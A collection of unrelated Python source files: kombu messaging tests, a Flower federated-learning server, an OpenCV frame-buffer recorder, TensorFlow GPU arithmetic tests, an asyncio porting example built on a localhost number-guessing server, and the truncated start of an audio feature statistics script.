assert entity.is_bound, "Expected entity is bound to begin this test."
# When: Entity channel connection has gone away
entity.channel.connection = None
# When: calling maybe_declare with retry
# Then: the RecoverableConnectionError should be raised
with pytest.raises(RecoverableConnectionError):
maybe_declare(entity, channel, retry=True)
class test_replies:
def test_send_reply(self):
req = Mock()
req.content_type = 'application/json'
req.content_encoding = 'binary'
req.properties = {'reply_to': 'hello',
'correlation_id': 'world'}
channel = Mock()
exchange = Mock()
exchange.is_bound = True
exchange.channel = channel
producer = Mock()
producer.channel = channel
producer.channel.connection.client.declared_entities = set()
send_reply(exchange, req, {'hello': 'world'}, producer)
assert producer.publish.call_count
args = producer.publish.call_args
assert args[0][0] == {'hello': 'world'}
assert args[1] == {
'exchange': exchange,
'routing_key': 'hello',
'correlation_id': 'world',
'serializer': 'json',
'retry': False,
'retry_policy': None,
'content_encoding': 'binary',
}
@patch('kombu.common.itermessages')
def test_collect_replies_with_ack(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
body, message = Mock(), Mock()
itermessages.return_value = [(body, message)]
it = collect_replies(conn, channel, queue, no_ack=False)
m = next(it)
assert m is body
itermessages.assert_called_with(conn, channel, queue, no_ack=False)
message.ack.assert_called_with()
with pytest.raises(StopIteration):
next(it)
channel.after_reply_message_received.assert_called_with(queue.name)
@patch('kombu.common.itermessages')
def test_collect_replies_no_ack(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
body, message = Mock(), Mock()
itermessages.return_value = [(body, message)]
it = collect_replies(conn, channel, queue)
m = next(it)
assert m is body
itermessages.assert_called_with(conn, channel, queue, no_ack=True)
message.ack.assert_not_called()
@patch('kombu.common.itermessages')
def test_collect_replies_no_replies(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
itermessages.return_value = []
it = collect_replies(conn, channel, queue)
with pytest.raises(StopIteration):
next(it)
channel.after_reply_message_received.assert_not_called()
class test_insured:
@patch('kombu.common.logger')
def test_ensure_errback(self, logger):
common._ensure_errback('foo', 30)
logger.error.assert_called()
def test_revive_connection(self):
on_revive = Mock()
channel = Mock()
common.revive_connection(Mock(), channel, on_revive)
on_revive.assert_called_with(channel)
common.revive_connection(Mock(), channel, None)
def get_insured_mocks(self, insured_returns=('works', 'ignored')):
conn = ContextMock()
pool = MockPool(conn)
fun = Mock()
insured = conn.autoretry.return_value = Mock()
insured.return_value = insured_returns
return conn, pool, fun, insured
def test_insured(self):
conn, pool, fun, insured = self.get_insured_mocks()
ret = common.insured(pool, fun, (2, 2), {'foo': 'bar'})
assert ret == 'works'
conn.ensure_connection.assert_called_with(
errback=common._ensure_errback,
)
insured.assert_called()
i_args, i_kwargs = insured.call_args
assert i_args == (2, 2)
assert i_kwargs == {'foo': 'bar', 'connection': conn}
conn.autoretry.assert_called()
ar_args, ar_kwargs = conn.autoretry.call_args
assert ar_args == (fun, conn.default_channel)
assert ar_kwargs.get('on_revive')
assert ar_kwargs.get('errback')
def test_insured_custom_errback(self):
conn, pool, fun, insured = self.get_insured_mocks()
custom_errback = Mock()
common.insured(pool, fun, (2, 2), {'foo': 'bar'},
errback=custom_errback)
conn.ensure_connection.assert_called_with(errback=custom_errback)
class MockConsumer:
consumers = set()
def __init__(self, channel, queues=None, callbacks=None, **kwargs):
self.channel = channel
self.queues = queues
self.callbacks = callbacks
def __enter__(self):
self.consumers.add(self)
return self
def __exit__(self, *exc_info):
self.consumers.discard(self)
class test_itermessages:
class MockConnection:
should_raise_timeout = False
def drain_events(self, **kwargs):
if self.should_raise_timeout:
raise socket.timeout()
for consumer in MockConsumer.consumers:
for callback in consumer.callbacks:
callback('body', 'message')
def test_default(self):
conn = self.MockConnection()
channel = Mock()
channel.connection.client = conn
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
ret = next(it)
assert ret == ('body', 'message')
with pytest.raises(StopIteration):
next(it)
def test_when_raises_socket_timeout(self):
conn = self.MockConnection()
conn.should_raise_timeout = True
channel = Mock()
channel.connection.client = conn
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
with pytest.raises(StopIteration):
next(it)
@patch('kombu.common.deque')
def test_when_raises_IndexError(self, deque):
deque_instance = deque.return_value = Mock()
deque_instance.popleft.side_effect = IndexError()
conn = self.MockConnection()
channel = Mock()
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
with pytest.raises(StopIteration):
next(it)
class test_QoS:
class _QoS(QoS):
def __init__(self, value):
self.value = value
QoS.__init__(self, None, value)
def set(self, value):
return value
def test_qos_exceeds_16bit(self):
with patch('kombu.common.logger') as logger:
callback = Mock()
qos = QoS(callback, 10)
qos.prev = 100
# cannot use 2 ** 32 because of a bug on macOS Py2.5:
# https://jira.mongodb.org/browse/PYTHON-389
qos.set(4294967296)
logger.warning.assert_called()
callback.assert_called_with(prefetch_count=0)
def test_qos_increment_decrement(self):
qos = self._QoS(10)
assert qos.increment_eventually() == 11
assert qos.increment_eventually(3) == 14
assert qos.increment_eventually(-30) == 14
assert qos.decrement_eventually(7) == 7
assert qos.decrement_eventually() == 6
def test_qos_disabled_increment_decrement(self):
qos = self._QoS(0)
assert qos.increment_eventually() == 0
assert qos.increment_eventually(3) == 0
assert qos.increment_eventually(-30) == 0
assert qos.decrement_eventually(7) == 0
assert qos.decrement_eventually() == 0
assert qos.decrement_eventually(10) == 0
def test_qos_thread_safe(self):
qos = self._QoS(10)
def add():
for i in range(1000):
qos.increment_eventually()
def sub():
for i in range(1000):
qos.decrement_eventually()
def threaded(funs):
from threading import Thread
threads = [Thread(target=fun) for fun in funs]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threaded([add, add])
assert qos.value == 2010
qos.value = 1000
threaded([add, sub]) # n = 2
assert qos.value == 1000
def test_exceeds_short(self):
qos = QoS(Mock(), PREFETCH_COUNT_MAX - 1)
qos.update()
assert qos.value == PREFETCH_COUNT_MAX - 1
qos.increment_eventually()
assert qos.value == PREFETCH_COUNT_MAX
qos.increment_eventually()
assert qos.value == PREFETCH_COUNT_MAX + 1
qos.decrement_eventually()
assert qos.value == PREFETCH_COUNT_MAX
qos.decrement_eventually()
assert qos.value == PREFETCH_COUNT_MAX - 1
def test_consumer_increment_decrement(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.update()
assert qos.value == 10
mconsumer.qos.assert_called_with(prefetch_count=10)
qos.decrement_eventually()
qos.update()
assert qos.value == 9
mconsumer.qos.assert_called_with(prefetch_count=9)
qos.decrement_eventually()
assert qos.value == 8
mconsumer.qos.assert_called_with(prefetch_count=9)
assert {'prefetch_count': 9} in mconsumer.qos.call_args
# Does not decrement 0 value
qos.value = 0
qos.decrement_eventually()
assert qos.value == 0
qos.increment_eventually()
assert qos.value == 0
def test_consumer_decrement_eventually(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.decrement_eventually()
assert qos.value == 9
qos.value = 0
qos.decrement_eventually()
assert qos.value == 0
def test_set(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.set(12)
assert qos.prev == 12
qos.set(qos.prev)
|
server.py
|
import flwr as fl
import multiprocessing as mp
import argparse
from flower_helpers import Net, FedAvgDp, get_weights, test
"""
If you get an error like: “failed to connect to all addresses” “grpc_status”:14
Then uncomment the lines bellow:
"""
# import os
# if os.environ.get("https_proxy"):
# del os.environ["https_proxy"]
# if os.environ.get("http_proxy"):
# del os.environ["http_proxy"]
batch_size = None
def get_eval_fn():
"""Get the evaluation function for server side.
Returns
-------
evaluate
The evaluation function
"""
def evaluate(weights):
"""Evaluation function for server side.
Parameters
----------
weights
Updated model weights to evaluate.
Returns
-------
loss
Loss on the test set.
accuracy
Accuracy on the test set.
"""
global batch_size
# Prepare multiprocess
manager = mp.Manager()
# We receive the results through a shared dictionary
return_dict = manager.dict()
# Create the process
# 0 is for the share and 1 total number of clients, here for server test
# we take the full test set
p = mp.Process(target=test, args=(weights, return_dict, 0, 1, batch_size))
# Start the process
p.start()
# Wait for it to end
p.join()
# Close it
try:
p.close()
except ValueError as e:
print(f"Couldn't close the evaluating process: {e}")
# Get the return values
loss = return_dict["loss"]
accuracy = return_dict["accuracy"]
# Del everything related to multiprocessing
del (manager, return_dict, p)
return float(loss), {"accuracy": float(accuracy)}
return evaluate
def main():
# Start Flower server for three rounds of federated learning
parser = argparse.ArgumentParser()
parser.add_argument(
"-r", type=int, default=3, help="Number of rounds for the federated training"
)
parser.add_argument(
"-nbc",
type=int,
default=2,
help="Number of clients to keep track of dataset share",
)
parser.add_argument("-b", type=int, default=256, help="Batch size")
parser.add_argument(
"-fc",
type=int,
default=2,
help="Min fit clients, min number of clients to be sampled next round",
)
parser.add_argument(
"-ac",
type=int,
default=2,
help="Min available clients, min number of clients that need to connect to the server before training round can start",
)
args = parser.parse_args()
rounds = int(args.r)
fc = int(args.fc)
ac = int(args.ac)
global batch_size
batch_size = int(args.b)
# Set the start method for multiprocessing in case Python version is under 3.8.1
mp.set_start_method("spawn")
# Create a new fresh model to initialize parameters
net = Net()
init_weights = get_weights(net)
# Convert the weights (np.ndarray) to parameters
init_param = fl.common.weights_to_parameters(init_weights)
# del the net as we don't need it anymore
del net
# Define the strategy
strategy = FedAvgDp(
fraction_fit=float(fc / ac),
min_fit_clients=fc,
min_available_clients=ac,
eval_fn=get_eval_fn(),
initial_parameters=init_param,
)
fl.server.start_server(
"[::]:8080", config={"num_rounds": rounds}, strategy=strategy
)
if __name__ == "__main__":
main()
|
eventrecording.py
|
from collections import deque
from threading import Thread
from queue import Queue
import time
import cv2
class EventDetection:
def __init__(self, bufsize=64, timeout=1.0):
self.bufsize = bufsize
self.timeout = timeout
# create a buffer named frames and a queue for said buffer
self.frames = deque(maxlen=self.bufsize)
self.Q = None
# create a video writer, writer thread, and bool for recording
self.writer = None
self.thread = None
self.recording = False
def update(self, frame):
# add frame to frame buffer
self.frames.appendleft(frame)
# if we are recording then update the queue with the frame too
if self.recording:
self.Q.put(frame)
def start(self, outputPath, fourcc, fps):
self.recording = True
# start the video writer and initialize the queue of frames that need to be written to file
self.writer = cv2.VideoWriter(outputPath, fourcc, fps,
(self.frames[0].shape[1], self.frames[0].shape[0]), True)
self.Q = Queue()
# add frames from dequeue to the queue
for i in range(len(self.frames), 0, -1):
self.Q.put(self.frames[i-1])
# spawn a new thread to write frames to the video file
self.thread = Thread(target=self.write, args=())
self.thread.daemon = True
self.thread.start()
def write(self):
while True:
# if there is no recording going on exit the thread
if not self.recording:
return
# check to see if there are entries in the queue
if not self.Q.empty():
# grab the next frame from the queue and write to video file
frame = self.Q.get()
self.writer.write(frame)
else:
time.sleep(self.timeout)
def flush(self):
# empty the queue by flushing all remaining frames to file
while not self.Q.empty():
frame = self.Q.get()
self.writer.write(frame)
def finish(self):
# stop recording, join the thread, flush all remaining frames in the queue to file,
# and release to writer pointer
self.recording = False
self.thread.join()
self.flush()
self.writer.release()
|
basic_gpu_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for basic component wise operations using a GPU device."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.gen_array_ops import _broadcast_gradient_args
from tensorflow.python.platform import test
class GPUBinaryOpsTest(test.TestCase):
def _compareGPU(self, x, y, np_func, tf_func):
with self.test_session(use_gpu=True) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_gpu = sess.run(out)
with self.test_session(use_gpu=False) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_cpu = sess.run(out)
self.assertAllClose(tf_cpu, tf_gpu)
def testFloatBasic(self):
x = np.linspace(-5, 20, 15).reshape(1, 3, 5).astype(np.float32)
y = np.linspace(20, -5, 15).reshape(1, 3, 5).astype(np.float32)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
self._compareGPU(x, y + 0.1, np.floor_divide, math_ops.floordiv)
self._compareGPU(x, y, np.power, math_ops.pow)
def testFloatWithBCast(self):
x = np.linspace(-5, 20, 15).reshape(3, 5).astype(np.float32)
y = np.linspace(20, -5, 30).reshape(2, 3, 5).astype(np.float32)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
def testDoubleBasic(self):
x = np.linspace(-5, 20, 15).reshape(1, 3, 5).astype(np.float64)
y = np.linspace(20, -5, 15).reshape(1, 3, 5).astype(np.float64)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
def testDoubleWithBCast(self):
x = np.linspace(-5, 20, 15).reshape(3, 5).astype(np.float64)
y = np.linspace(20, -5, 30).reshape(2, 3, 5).astype(np.float64)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
class MathBuiltinUnaryTest(test.TestCase):
def _compare(self, x, np_func, tf_func, use_gpu):
np_out = np_func(x)
with self.test_session(use_gpu=use_gpu) as sess:
inx = ops.convert_to_tensor(x)
ofunc = tf_func(inx)
tf_out = sess.run(ofunc)
self.assertAllClose(np_out, tf_out)
def _inv(self, x):
return 1.0 / x
def _rsqrt(self, x):
return self._inv(np.sqrt(x))
def _testDtype(self, dtype, use_gpu):
data = (np.arange(-3, 3) / 4.).reshape([1, 3, 2]).astype(dtype)
self._compare(data, np.abs, math_ops.abs, use_gpu)
self._compare(data, np.arccos, math_ops.acos, use_gpu)
self._compare(data, np.arcsin, math_ops.asin, use_gpu)
self._compare(data, np.arctan, math_ops.atan, use_gpu)
self._compare(data, np.ceil, math_ops.ceil, use_gpu)
self._compare(data, np.cos, math_ops.cos, use_gpu)
self._compare(data, np.exp, math_ops.exp, use_gpu)
self._compare(data, np.floor, math_ops.floor, use_gpu)
self._compare(data, np.log, math_ops.log, use_gpu)
self._compare(data, np.log1p, math_ops.log1p, use_gpu)
self._compare(data, np.negative, math_ops.negative, use_gpu)
self._compare(data, self._rsqrt, math_ops.rsqrt, use_gpu)
self._compare(data, np.sin, math_ops.sin, use_gpu)
self._compare(data, np.sqrt, math_ops.sqrt, use_gpu)
self._compare(data, np.square, math_ops.square, use_gpu)
self._compare(data, np.tan, math_ops.tan, use_gpu)
self._compare(data, np.tanh, math_ops.tanh, use_gpu)
def testTypes(self):
for dtype in [np.float32]:
self._testDtype(dtype, use_gpu=True)
def testFloorDevide(self):
x = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
y = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
np_out = np.floor_divide(x, y + 0.1)
with self.test_session(use_gpu=True) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y + 0.1)
ofunc = inx / iny
out_func2 = math_ops.floor(ofunc)
tf_out = sess.run(out_func2)
self.assertAllClose(np_out, tf_out)
class BroadcastSimpleTest(test.TestCase):
def _GetGradientArgs(self, xs, ys):
with self.test_session(use_gpu=True) as sess:
return sess.run(_broadcast_gradient_args(xs, ys))
def testBroadcast(self):
r0, r1 = self._GetGradientArgs([2, 3, 5], [1])
self.assertAllEqual(r0, [])
self.assertAllEqual(r1, [0, 1, 2])
_GRAD_TOL = {dtypes.float32: 1e-3}
def _compareGradientX(self,
x,
y,
np_func,
tf_func,
numeric_gradient_type=None):
z = np_func(x, y)
zs = list(z.shape)
with self.test_session():
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
if x.dtype in (np.float32, np.float64):
out = 1.1 * tf_func(inx, iny)
else:
out = tf_func(inx, iny)
xs = list(x.shape)
jacob_t, jacob_n = gradient_checker.compute_gradient(
inx, xs, out, zs, x_init_value=x)
tol = self._GRAD_TOL[dtypes.as_dtype(x.dtype)]
self.assertAllClose(jacob_t, jacob_n, rtol=tol, atol=tol)
def _compareGradientY(self,
x,
y,
np_func,
tf_func,
numeric_gradient_type=None):
z = np_func(x, y)
zs = list(z.shape)
with self.test_session():
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
if x.dtype in (np.float32, np.float64):
out = 1.1 * tf_func(inx, iny)
else:
out = tf_func(inx, iny)
ys = list(np.shape(y))
jacob_t, jacob_n = gradient_checker.compute_gradient(
iny, ys, out, zs, x_init_value=y)
tol = self._GRAD_TOL[dtypes.as_dtype(x.dtype)]
self.assertAllClose(jacob_t, jacob_n, rtol=tol, atol=tol)
def _compareGpu(self, x, y, np_func, tf_func):
np_ans = np_func(x, y)
with self.test_session(use_gpu=True):
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_gpu = out.eval()
self.assertAllClose(np_ans, tf_gpu)
self.assertShapeEqual(np_ans, out)
# TODO(zhifengc/ke): make gradient checker work on GPU.
def testGradient(self):
x = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
y = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
self._compareGradientX(x, y, np.true_divide, math_ops.truediv)
self._compareGradientY(x, y, np.true_divide, math_ops.truediv)
self._compareGpu(x, y, np.true_divide, math_ops.truediv)
self._compareGpu(x, y + 0.1, np.floor_divide, math_ops.floordiv)
class GpuMultiSessionMemoryTest(test_util.TensorFlowTestCase):
"""Tests concurrent sessions executing on the same GPU."""
def _run_session(self, session, results):
n_iterations = 500
with session as s:
data = variables.Variable(1.0)
with ops.device('/gpu:0'):
random_seed.set_random_seed(1)
matrix1 = variables.Variable(
random_ops.truncated_normal([1024, 1]), name='matrix1')
matrix2 = variables.Variable(
random_ops.truncated_normal([1, 1024]), name='matrix2')
x1 = math_ops.multiply(data, matrix1, name='x1')
x3 = math_ops.matmul(x1, math_ops.matmul(matrix2, matrix1))
x4 = math_ops.matmul(array_ops.transpose(x3), x3, name='x4')
s.run(variables.global_variables_initializer())
for _ in xrange(n_iterations):
value = s.run(x4)
results.add(value.flat[0])
if len(results) != 1:
break
def testConcurrentSessions(self):
n_threads = 4
threads = []
results = []
for _ in xrange(n_threads):
session = self.test_session(graph=ops.Graph(), use_gpu=True)
results.append(set())
args = (session, results[-1])
threads.append(threading.Thread(target=self._run_session, args=args))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
flat_results = set([x for x in itertools.chain(*results)])
self.assertEqual(1,
len(flat_results),
'Expected single value, got %r' % flat_results)
if __name__ == '__main__':
test.main()
|
Item61.py
|
"""
Item 61: Know How to Port Threaded I/O to asyncio
This item shows how to port code that does threaded, blocking I/O over coroutines and asynchronous I/O.
Slaitkin implements a TCP-based server (Transfer Control Protocol. See https://en.wikipedia.org/wiki/Transmission_Control_Protocol)
for guessing a number. This type of client/server is typically built using blocking I/O and threads.
Python provides asynchronous versions of for loops, with statements, generators, comprehensions, and library
helper functions. Next and iter are not currently implemented.
The asyncio built-in module makes it easy to port existing code that uses threads and blocking I/O over to coroutines
and asynchronous I/O.
See https://docs.python.or/3/library/asynchio.html for more information.
"""
#!/usr/bin/env PYTHONHASHSEED=1234 python3
# Reproduce book environment
import random
random.seed(1234)
import logging
from pprint import pprint
from sys import stdout as STDOUT
# Write all output to a temporary directory
import atexit
import gc
import io
import os
import tempfile
TEST_DIR = tempfile.TemporaryDirectory()
atexit.register(TEST_DIR.cleanup)
# Make sure Windows processes exit cleanly
OLD_CWD = os.getcwd()
atexit.register(lambda: os.chdir(OLD_CWD))
os.chdir(TEST_DIR.name)
def close_open_files():
everything = gc.get_objects()
for obj in everything:
if isinstance(obj, io.IOBase):
obj.close()
atexit.register(close_open_files)
# Example 1: First we construct a helper class for managing sending and receiving messages.
class EOFError(Exception):
pass
class ConnectionBase:
def __init__(self, connection):
self.connection = connection
self.file = connection.makefile('rb')
def send(self, command):
line = command + '\n'
data = line.encode()
self.connection.send(data)
def receive(self):
line = self.file.readline()
if not line:
raise EOFError('Connection closed')
return line[:-1].decode()
# Example 2: We implement the server. Handles one connection at a time and maintains the client's
# session state.
import random
WARMER = 'Warmer'
COLDER = 'Colder'
UNSURE = 'Unsure'
CORRECT = 'Correct'
class UnknownCommandError(Exception):
pass
class Session(ConnectionBase):
def __init__(self, *args):
# See Item 40 - super() solves the problem of superclass initialization and diamond inheritance.
# See also: https://en.wikipedia.org/wiki/Multiple_inheritance
super().__init__(*args)
self._clear_state(None, None)
def _clear_state(self, lower, upper):
self.lower = lower
self.upper = upper
self.secret = None
self.guesses = []
# Example 3: Handles incoming commands and chooses the appropriate method
def loop(self):
while command := self.receive():
parts = command.split(' ')
if parts[0] == 'PARAMS':
self.set_params(parts)
elif parts[0] == 'NUMBER':
self.send_number()
elif parts[0] == 'REPORT':
self.receive_report(parts)
else:
raise UnknownCommandError(command)
# Example 4: Sets upper and lower boundaries for the guess.
def set_params(self, parts):
assert len(parts) == 3
lower = int(parts[1])
upper = int(parts[2])
self._clear_state(lower, upper)
# Example 5: Makes a new guess making sure the same number is not chosen.
def next_guess(self):
if self.secret is not None:
return self.secret
while True:
guess = random.randint(self.lower, self.upper)
if guess not in self.guesses:
return guess
def send_number(self):
guess = self.next_guess()
self.guesses.append(guess)
self.send(format(guess))
# Example 6: Receives client decision and returns colder or warmer.
def receive_report(self, parts):
assert len(parts) == 2
decision = parts[1]
last = self.guesses[-1]
if decision == CORRECT:
self.secret = last
print(f'Server: {last} is {decision}')
# Example 7: Implement the client using a stateful class
import contextlib
import math
class Client(ConnectionBase):
def __init__(self, *args):
super().__init__(*args)
self._clear_state()
def _clear_state(self):
self.secret = None
self.last_distance = None
# Example 8: Sends first commands to server
@contextlib.contextmanager
def session(self, lower, upper, secret):
print(f'Guess a number between {lower} and {upper}!'
f' Shhhhh, it\'s {secret}.')
self.secret = secret
self.send(f'PARAMS {lower} {upper}')
try:
yield
finally:
self._clear_state()
self.send('PARAMS 0 -1')
# Example 9: New guesses are requested from the server.
def request_numbers(self, count):
for _ in range(count):
self.send('NUMBER')
data = self.receive()
yield int(data)
if self.last_distance == 0:
return
# Example 10: Reports whether a guess is warmer or colder.
def report_outcome(self, number):
new_distance = math.fabs(number - self.secret)
decision = UNSURE
if new_distance == 0:
decision = CORRECT
elif self.last_distance is None:
pass
elif new_distance < self.last_distance:
decision = WARMER
elif new_distance > self.last_distance:
decision = COLDER
self.last_distance = new_distance
self.send(f'REPORT {decision}')
return decision
# Example 11: Run the server.
import socket
from threading import Thread
def handle_connection(connection):
with connection:
session = Session(connection)
try:
session.loop()
except EOFError:
pass
def run_server(address):
with socket.socket() as listener:
# Allow the port to be reused
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(address)
listener.listen()
while True:
connection, _ = listener.accept()
thread = Thread(target=handle_connection,
args=(connection,),
daemon=True)
thread.start()
# Example 12: CLients runs in the main thread and returns the results.
def run_client(address):
with socket.create_connection(address) as connection:
client = Client(connection)
with client.session(1, 5, 3):
results = [(x, client.report_outcome(x))
for x in client.request_numbers(5)]
with client.session(10, 15, 12):
for number in client.request_numbers(5):
outcome = client.report_outcome(number)
results.append((number, outcome))
return results
# Example 13: Put everything together in main() and check if it works.
def main():
address = ('127.0.0.1', 1234)
server_thread = Thread(
target=run_server, args=(address,), daemon=True)
server_thread.start()
results = run_client(address)
for number, outcome in results:
print(f'Client: {number} is {outcome}')
main()
print('********* End of program using threading *********')
# Example 14: Now we refactor the code to use asyncio
# First we update ConnectionBase to provide coroutines.
class AsyncConnectionBase:
def __init__(self, reader, writer): # Changed
self.reader = reader # Changed
self.writer = writer # Changed
async def send(self, command):
line = command + '\n'
data = line.encode()
self.writer.write(data) # Changed
await self.writer.drain() # Changed
async def receive(self):
line = await self.reader.readline() # Changed
if not line:
raise EOFError('Connection closed')
return line[:-1].decode()
# Example 15: Create a session class for a single connection.
class AsyncSession(AsyncConnectionBase): # Changed
def __init__(self, *args):
super().__init__(*args)
self._clear_values(None, None)
def _clear_values(self, lower, upper):
self.lower = lower
self.upper = upper
self.secret = None
self.guesses = []
# Example 16: Need to add the await keyword
async def loop(self): # Changed
while command := await self.receive(): # Changed
parts = command.split(' ')
if parts[0] == 'PARAMS':
self.set_params(parts)
elif parts[0] == 'NUMBER':
await self.send_number() # Changed
elif parts[0] == 'REPORT':
self.receive_report(parts)
else:
raise UnknownCommandError(command)
# Example 17
def set_params(self, parts):
assert len(parts) == 3
lower = int(parts[1])
upper = int(parts[2])
self._clear_values(lower, upper)
# Example 18: Add async and await keywords
def next_guess(self):
if self.secret is not None:
return self.secret
while True:
guess = random.randint(self.lower, self.upper)
if guess not in self.guesses:
return guess
async def send_number(self): # Changed
guess = self.next_guess()
self.guesses.append(guess)
await self.send(format(guess)) # Changed
# Example 19
def receive_report(self, parts):
assert len(parts) == 2
decision = parts[1]
last = self.guesses[-1]
if decision == CORRECT:
self.secret = last
print(f'Server: {last} is {decision}')
# Example 20: Need to inherit from AsyncConnectioBase
class AsyncClient(AsyncConnectionBase): # Changed
def __init__(self, *args):
super().__init__(*args)
self._clear_state()
def _clear_state(self):
self.secret = None
self.last_distance = None
# Example 21: Need to use async context manager.
@contextlib.asynccontextmanager # Changed
async def session(self, lower, upper, secret): # Changed
print(f'Guess a number between {lower} and {upper}!'
f' Shhhhh, it\'s {secret}.')
self.secret = secret
await self.send(f'PARAMS {lower} {upper}') # Changed
try:
yield
finally:
self._clear_state()
await self.send('PARAMS 0 -1') # Changed
# Example 22
async def request_numbers(self, count): # Changed
for _ in range(count):
await self.send('NUMBER') # Changed
data = await self.receive() # Changed
yield int(data)
if self.last_distance == 0:
return
# Example 23
async def report_outcome(self, number): # Changed
new_distance = math.fabs(number - self.secret)
decision = UNSURE
if new_distance == 0:
decision = CORRECT
elif self.last_distance is None:
pass
elif new_distance < self.last_distance:
decision = WARMER
elif new_distance > self.last_distance:
decision = COLDER
self.last_distance = new_distance
await self.send(f'REPORT {decision}') # Changed
# Make it so the output printing is in
# the same order as the threaded version.
await asyncio.sleep(0.01)
return decision
# Example 24: Nees to rewrite the code that runs the server.
import asyncio
async def handle_async_connection(reader, writer):
session = AsyncSession(reader, writer)
try:
await session.loop()
except EOFError:
pass
async def run_async_server(address):
server = await asyncio.start_server(
handle_async_connection, *address)
async with server:
await server.serve_forever()
# Example 25: Async keyword need here throughout
async def run_async_client(address):
# Wait for the server to listen before trying to connect
await asyncio.sleep(0.1)
streams = await asyncio.open_connection(*address) # New
client = AsyncClient(*streams) # New
async with client.session(1, 5, 3):
results = [(x, await client.report_outcome(x))
async for x in client.request_numbers(5)]
async with client.session(10, 15, 12):
async for number in client.request_numbers(5):
outcome = await client.report_outcome(number)
results.append((number, outcome))
_, writer = streams # New
writer.close() # New
await writer.wait_closed() # New
return results
# Example 26: Use async create_task to glue the pieces together.
async def main_async():
address = ('127.0.0.1', 4321)
server = run_async_server(address)
asyncio.create_task(server)
results = await run_async_client(address)
for number, outcome in results:
print(f'Client: {number} is {outcome}')
logging.getLogger().setLevel(logging.ERROR)
asyncio.run(main_async())
logging.getLogger().setLevel(logging.DEBUG)
print('********* End of program using coroutines *********')
|
calc_stats.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2020 Patrick Lumban Tobing (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
from __future__ import print_function
import argparse
import multiprocessing as mp
import logging
import os
import numpy as np
from sklearn.preprocessing import StandardScaler
from utils import check_hdf5
from utils import read_hdf5
from utils import read_txt
from utils import write_hdf5
from multiprocessing import Array
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--feats", default=None, required=True,
help="name of the list of hdf5 files")
parser.add_argument(
"--stats", default=None, required=True,
help="filename of stats for hdf5 format")
parser.add_argument("--expdir", required=True,
type=str, help="directory to save the log")
parser.add_argument("--mcep_dim", default=50,
type=int, help="dimension of mel-cepstrum")
parser.add_argument(
"--n_jobs", default=10,
type=int, help="number of parallel jobs")
parser.add_argument(
"--verbose", default=1,
type=int, help="log message level")
args = parser.parse_args()
# set log level
if args.verbose == 1:
logging.basicConfig(level=logging.INFO,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/calc_stats.log")
logging.getLogger().addHandler(logging.StreamHandler())
elif args.verbose > 1:
logging.basicConfig(level=logging.DEBUG,
